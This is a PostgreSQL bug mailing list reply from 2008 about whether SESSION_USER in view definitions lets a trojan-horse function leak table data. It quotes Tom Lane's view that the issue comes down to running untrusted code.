I didn't realize this was a public mailing list, I posted this report at
http://www.postgresql.org/support/submitbug and thought that it would
only be reported internally.
I agree with your analysis, although Carol may or may not be aware that
she is executing any functions at all. But in any case, Heikki
Linnakangas' observation that you shouldn't even access untrusted views
clearly applies here. Thank you both for your prompt replies.
Tom Lane wrote:
> "Lars Olson" <leolson1(at)uiuc(dot)edu> writes:
>> Creating a view that depends on the value of SESSION_USER enables a
>> minimally-privileged user to write a user-defined function that contains a
>> trojan-horse to get arbitrary data from the base table.
> This example proves nothing except that you shouldn't execute untrusted
> code --- Carol gave up her data by willingly executing Bob's function.
> I don't think that the use of SESSION_USER is particularly to blame.
> There are certainly any number of other ways Bob could have abused
> her trust here.
>> This is highly related to a paper I am preparing for a security conference
>> that I am submitting in two weeks. Sorry about the short notice, I only
>> just thought of this problem yesterday. I would like to use this as an
>> example in my paper, but I will not do so without PostgreSQL's permission.
>> Please advise.
> If this were a security issue, you already spilled the beans by
> reporting it to a public mailing list; so I'm unsure what you are
> concerned about.
> regards, tom lane
pgsql-bugs by date
|Next:||From: Dave Page||Date: 2008-03-31 22:04:25|
|Subject: Re: BUG #4074: Using SESSION_USER or CURRENT_USER in a view definition is unsafe|
|Previous:||From: Tom Lane||Date: 2008-03-31 21:46:48|
|Subject: Re: BUG #4074: Using SESSION_USER or CURRENT_USER in a view definition is unsafe |